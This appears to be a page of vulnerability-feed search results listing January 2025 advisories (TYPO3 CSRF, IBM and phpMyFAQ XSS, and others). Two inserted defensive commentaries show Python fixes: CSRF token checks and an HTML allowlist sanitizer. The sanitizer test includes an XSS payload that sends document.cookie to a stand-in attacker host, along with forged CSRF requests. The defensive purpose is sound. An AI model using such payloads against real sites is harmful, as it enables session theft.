8015 matches found

OSV · added 2025/01/14 3:40 p.m. · 13 views

GHSA-4G52-PQ8J-6QV5 TYPO3 Extension Manager Module vulnerable to Cross-Site Request Forgery

Problem: A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

CVSS 7.5 · AI score 8 · EPSS 0.00352
Exploits 0 · References 5
Snyk · added 2025/01/14 3:25 p.m. · 3 views

Exposed Dangerous Method or Function

Overview: Affected versions of this package are vulnerable to Exposed Dangerous Method or Function via the backend user interface functionality involving deep links. An attacker can manipulate the victim's dashboard configuration by deceiving the victim into interacting with a malicious URL while...

CVSS 5.1 · AI score 6.9 · EPSS 0.00188
Exploits 0 · References 2
Github Security Blog · added 2025/01/14 3:25 p.m. · 16 views

TYPO3 Cross-Site Request Forgery in Dashboard Module

Problem: A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

CVSS 4.3 · AI score 4.5 · EPSS 0.00188
Exploits 0 · References 5 · Affected Software 1
OSV · added 2025/01/14 3:24 p.m. · 7 views

GHSA-CJFR-9F5R-3Q93 TYPO3 Cross-Site Request Forgery in Log Module

Problem: A vulnerability has been identified in the backend user interface functionality involving deep links. Specifically, this functionality is susceptible to Cross-Site Request Forgery (CSRF). Additionally, state-changing actions in downstream components incorrectly accepted submissions via HTTP...

CVSS 4.3 · AI score 4.5 · EPSS 0.00235
Exploits 0 · References 7
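The four TYPO3 entries above (Extension Manager, Dashboard, Log module, and the Snyk write-up of the dashboard issue) describe one pair of defects: a backend "deep link" that carries a complete action in the URL, and downstream handlers that perform the state change for any submission that arrives with the victim's session, with no token proving the request came from the backend's own UI. The summaries are cut off before they name the HTTP method; the usual case for a deep link is a plain GET, which is what the example below assumes. The following Python sketch is an added example and not TYPO3 code: the `Request`/`Backend` classes, the `/backend/dashboard` path, the `set_widget` action and the session identifier are all invented for illustration. It puts a handler with both defects next to one that rejects non-POST requests and requires a session-bound HMAC token, then runs a forged deep link, a forged cross-site POST and a legitimate request against each.

```python
"""Added example (not TYPO3 code): CSRF via a state-changing deep link, and the
two checks that close it (POST-only for mutations, session-bound token)."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlparse

# Per-deployment secret used to bind tokens to sessions (assumed to live in config).
SERVER_KEY = secrets.token_bytes(32)


@dataclass
class Request:
    method: str
    url: str
    session_id: str          # taken from the session cookie the browser sends automatically
    form: dict = field(default_factory=dict)


@dataclass
class Backend:
    dashboard: dict = field(default_factory=dict)   # hypothetical per-user widget config


def csrf_token(session_id: str) -> str:
    """Token an attacker cannot forge: HMAC of the session id under a server secret."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_handler(backend: Backend, req: Request) -> int:
    """Defect: the action lives in the query string and runs regardless of method or origin."""
    q = parse_qs(urlparse(req.url).query)
    if q.get("action") == ["set_widget"]:
        backend.dashboard[q["widget"][0]] = q["value"][0]
        return 200
    return 404


def hardened_handler(backend: Backend, req: Request) -> int:
    # 1. Deep links (GET) may only render; every mutation must be a POST.
    if req.method != "POST":
        return 405
    # 2. The POST must carry the token issued for this very session; constant-time compare.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(req.session_id)):
        return 403
    if req.form.get("action") == "set_widget":
        backend.dashboard[req.form["widget"]] = req.form["value"]
        return 200
    return 404


def run_scenarios() -> dict:
    """Constructed scenarios: forged GET deep link, forged POST, legitimate POST."""
    sid = "victim-session-id"                       # constructed session identifier
    vuln, hard = Backend(), Backend()
    # Planted in an <img src> or a redirect on any site; the browser attaches the victim's cookie.
    forged_get = Request("GET", "/backend/dashboard?action=set_widget&widget=news&value=evil", sid)
    out = {
        "vulnerable_get": vulnerable_handler(vuln, forged_get),
        "hardened_get": hardened_handler(hard, forged_get),
    }
    # Attacker upgrades to an auto-submitting cross-site form: still no token.
    forged_post = Request("POST", "/backend/dashboard", sid,
                          {"action": "set_widget", "widget": "news", "value": "evil"})
    out["hardened_post_no_token"] = hardened_handler(hard, forged_post)
    # The backend's own form embeds the session-bound token.
    legit = Request("POST", "/backend/dashboard", sid,
                    {"action": "set_widget", "widget": "news", "value": "weather",
                     "csrf_token": csrf_token(sid)})
    out["hardened_post_with_token"] = hardened_handler(hard, legit)
    out["vulnerable_dashboard"] = dict(vuln.dashboard)
    out["hardened_dashboard"] = dict(hard.dashboard)
    return out


if __name__ == "__main__":
    for name, value in run_scenarios().items():
        print(f"{name}: {value}")
```

The method check alone is not sufficient (the forged POST shows why), and the token alone is not sufficient either if GET still mutates, because a token can be leaked through a referrer or a copied URL; the two checks belong together. In a real deployment the token would be issued per session or per form by the framework rather than recomputed from the session id, but the binding property is the same.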
BDU FSTEC · added 2025/01/13 12:00 a.m. · 4 views

The vulnerability in the Mozilla Firefox browser and the Thunderbird email client on Android stems from an improper limitation of the displayed user interface layers, allowing attackers to perform a tapjacking attack.

The vulnerability in the Mozilla Firefox browser and the Thunderbird email client on Android operating systems is related to an improper limitation of the displayed user interface layers. Exploiting this vulnerability allows a remote attacker to perform a type of attack known as tapjacking...

CVSS 9.4 · AI score 6.5 · EPSS 0.00488
Exploits 0 · References 13 · Affected Software 3
CNNVD · added 2025/01/13 12:00 a.m. · 3 views

SAP GUI security vulnerability

SAP GUI is a graphical user interface for SAP systems from the German company SAP. A security vulnerability exists in SAP GUI for Windows that stems from storing user input on the client PC to improve usability; an attacker is able to read this data...

CVSS 6 · AI score 6.6 · EPSS 0.00233
Exploits 0 · References 3
OSV · added 2025/01/12 2:15 a.m. · 2 views

CVE-2021-29669

IBM Jazz Foundation 6.0.6, 6.0.6.1, 7.0, 7.0.1, and 7.0.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentials disclosure within a trusted session...

CVSS 5.4 · AI score 5.1 · EPSS 0.00215
Exploits 0 · References 1
OSV · added 2025/01/12 2:15 a.m. · 3 views

CVE-2024-49785

IBM watsonx.ai 1.1 through 2.0.3 and IBM watsonx.ai on Cloud Pak for Data 4.8 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to...

CVSS 5.4 · AI score 5.5 · EPSS 0.00215
Exploits 0 · References 1
CNNVD · added 2025/01/12 12:00 a.m. · 3 views

IBM Jazz Foundation cross-site scripting vulnerability

IBM Jazz Foundation is a next-generation collaboration platform for software delivery from International Business Machines (IBM). A cross-site scripting vulnerability exists in IBM Jazz Foundation. An attacker could exploit the vulnerability to embed arbitrary JavaScript code in the Web ...

CVSS 5.4 · AI score 6.1 · EPSS 0.00215
Exploits 0 · References 1
CNNVD · added 2025/01/12 12:00 a.m. · 4 views

IBM watsonx.ai cross-site scripting vulnerability

IBM watsonx.ai is a library from International Business Machines (IBM) that allows use of the watsonx.ai service on IBM Cloud and IBM Cloud for Data. A cross-site scripting vulnerability exists in IBM watsonx.ai versions 1.1 through 2.0.3 and IBM watsonx.ai on Cloud Pak for Data versions 4.8...

CVSS 5.4 · AI score 6.1 · EPSS 0.00215
Exploits 0 · References 2
Positive Technologies · added 2025/01/12 12:00 a.m. · 10 views

PT-2025-2861 · Ibm · Cloud Pak For Data +1

Name of the Vulnerable Software and Affected Versions: IBM watsonx.ai versions 1.1 through 2.0.3; IBM watsonx.ai on Cloud Pak for Data versions 4.8 through 5.0.3. Description: This issue allows an authenticated user to embed arbitrary JavaScript code in the Web UI, altering the intended functionali...

CVSS 5.4 · AI score 6.2 · EPSS 0.00215
Exploits 0 · References 7
Redos · added 2025/01/10 12:00 a.m. · 156 views

ROS-20250110-06

The vulnerability in the Zabbix universal monitoring system server is related to the use of uncontrolled format strings when processing HttpRequest objects. Exploitation of the vulnerability could allow an attacker, acting remotely, to gain...

CVSS 9.1 · AI score 9.2 · EPSS 0.00952
Exploits 0
NVD · added 2025/01/09 7:15 a.m. · 14 views

CVE-2025-22445

Mattermost versions 10.x <= 10.2 fail to accurately reflect missing settings, which allows confusion for admins regarding a Calls security-sensitive configuration via incorrect UI reporting...

CVSS 5.3 · EPSS 0.00312
Exploits 0 · References 1
Veracode · added 2025/01/09 5:49 a.m. · 6 views

Cross-site Scripting (XSS)

phpMyFAQ is vulnerable to Cross-site Scripting (XSS). The vulnerability is due to improper sanitization of HTML content in the FAQ editor at http://localhost/admin/index.php?action=editentry . Attackers can inject malformed HTML elements styled to cover the entire screen, disrupting the user...

CVSS 7.6 · AI score 6.2 · EPSS 0.00396
Exploits 1 · References 3 · Affected Software 2
CNNVD · added 2025/01/08 12:00 a.m. · 3 views

Huawei HarmonyOS security vulnerability

Huawei HarmonyOS is an operating system from Huawei, a Chinese company. It is a full-scenario distributed operating system based on a microkernel. Huawei EMUI (Emotion UI) is an operating system developed by Huawei based on Android. A security vulnerability exists in Huawei HarmonyOS and...

CVSS 7.5 · AI score 6.7 · EPSS 0.00145
Exploits 0 · References 2
OSV · added 2025/01/06 5:15 p.m. · 2 views

CVE-2024-51472

IBM UrbanCode Deploy (UCD) 7.2 through 7.2.3.13, 7.3 through 7.3.2.8, and IBM DevOps Deploy 8.0 through 8.0.1.3 are vulnerable to HTML injection. This vulnerability may allow a user to embed arbitrary HTML tags in the Web UI, potentially leading to sensitive information disclosure...

CVSS 3.1 · AI score 5.9
Exploits 0 · References 1
OSV · added 2025/01/06 4:15 p.m. · 3 views

CVE-2024-31914

IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.1.2.5 and 6.2.0.0 through 6.2.0.2 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI, thus altering the intended functionality and potentially leading to credentia...

CVSS 6.4 · AI score 5.5 · EPSS 0.00236
Exploits 0 · References 1
CNNVD · added 2025/01/06 12:00 a.m. · 3 views

IBM Sterling B2B Integrator cross-site scripting vulnerability

IBM Sterling B2B Integrator is a suite of software from International Business Machines (IBM) that integrates critical B2B processes, transactions, and relationships. The software supports secure integration of complex B2B processes with diverse partner communities. A cross-site scripting...

CVSS 6.4 · AI score 6 · EPSS 0.00236
Exploits 0 · References 2
Github Security Blog · added 2025/01/02 10:43 p.m. · 15 views

phpMyFAQ Vulnerable to Stored HTML Injection at FAQ

Summary: Due to insufficient validation of the content of new FAQ posts, it is possible for authenticated users to inject malicious HTML or JavaScript code that can impact other users viewing the FAQ. This vulnerability arises when user-provided inputs in FAQ entries are not sanitized or escaped...

CVSS 7.6 · AI score 6.2 · EPSS 0.00396
Exploits 1 · References 3 · Affected Software 2
Vulnrichment · added 2025/01/02 5:27 p.m. · 5 views

CVE-2024-56199 phpMyFAQ Vulnerable to Stored HTML Injection at FAQ

phpMyFAQ is an open source FAQ web application. Starting no later than version 3.2.10 and prior to version 4.0.2, an attacker can inject malicious HTML content into the FAQ editor at http://localhost/admin/index.php?action=editentry, resulting in a complete disruption of the FAQ page's user...

CVSS 5.2 · AI score 7.2 · EPSS 0.00396
Exploits 1 · References 1
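The three phpMyFAQ entries (the Veracode summary, the GitHub advisory and the Vulnrichment record for CVE-2024-56199) all come down to the same defect: an FAQ editor that has to accept rich text stores what an authenticated author submits without reducing it to a safe subset, so a full-screen overlay element, or script, survives into every reader's page. The standard fix is an allowlist sanitizer applied on save (and again on render, if the storage has ever held unsanitized data): keep a short list of formatting tags, keep `href` only with a safe scheme, and drop every other tag, every inline style and every event handler. The Python below is an added example and not phpMyFAQ code; the allowlist, the `sanitize` function and the payload are constructed here to illustrate the technique, and the payload's overlay `<div>` is modelled on the "elements styled to cover the entire screen" the Veracode summary describes.

```python
"""Added example (not phpMyFAQ code): allowlist HTML sanitizer for stored rich text.
Unknown tags are dropped but their text is kept; <script>/<style> bodies are dropped
entirely; only an explicit attribute allowlist survives, and href must be http(s)/mailto."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "strong", "em", "ul", "ol", "li", "a", "code", "pre", "br"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style, no class, no on* handlers anywhere
SAFE_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
RAW_TEXT_TAGS = {"script", "style"}      # their content is code, not text: drop it


class AllowlistSanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.raw_depth = 0               # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.raw_depth += 1
            return
        if self.raw_depth or tag not in ALLOWED_TAGS:
            return                       # tag dropped; its text still arrives via handle_data
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # drops style="position:fixed..." and onclick=...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                continue                 # drops javascript:, data:, vbscript:, ...
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.raw_depth = max(0, self.raw_depth - 1)
            return
        if not self.raw_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.raw_depth:
            self.out.append(escape(data, quote=False))   # re-escape: charrefs were decoded


def sanitize(fragment: str) -> str:
    """Reduce an untrusted HTML fragment to the allowlisted subset."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


# Constructed payload: legitimate formatting plus a full-screen overlay, a script,
# a javascript: link with a handler, and an onerror image.
PAYLOAD = (
    '<p>Legit <b>answer</b> with <a href="https://example.com/docs">a link</a>.</p>'
    '<div style="position:fixed;top:0;left:0;width:100vw;height:100vh;background:#fff;z-index:9999">'
    'overlay</div>'
    '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>'
    '<a href="javascript:alert(1)" onclick="alert(2)">click</a>'
    '<img src=x onerror="alert(3)">'
)

if __name__ == "__main__":
    print(sanitize(PAYLOAD))
```

The parser keeps the text of dropped elements ("overlay", "click") so an author's content is not silently lost, but nothing that can position, script or navigate survives. Two caveats a practitioner should add before using this shape in production: balance unclosed allowlisted tags (an author's unclosed `<b>` will otherwise leak formatting into the surrounding page), and run the sanitizer on output as well as on save until every stored entry written by a vulnerable version has been re-sanitized.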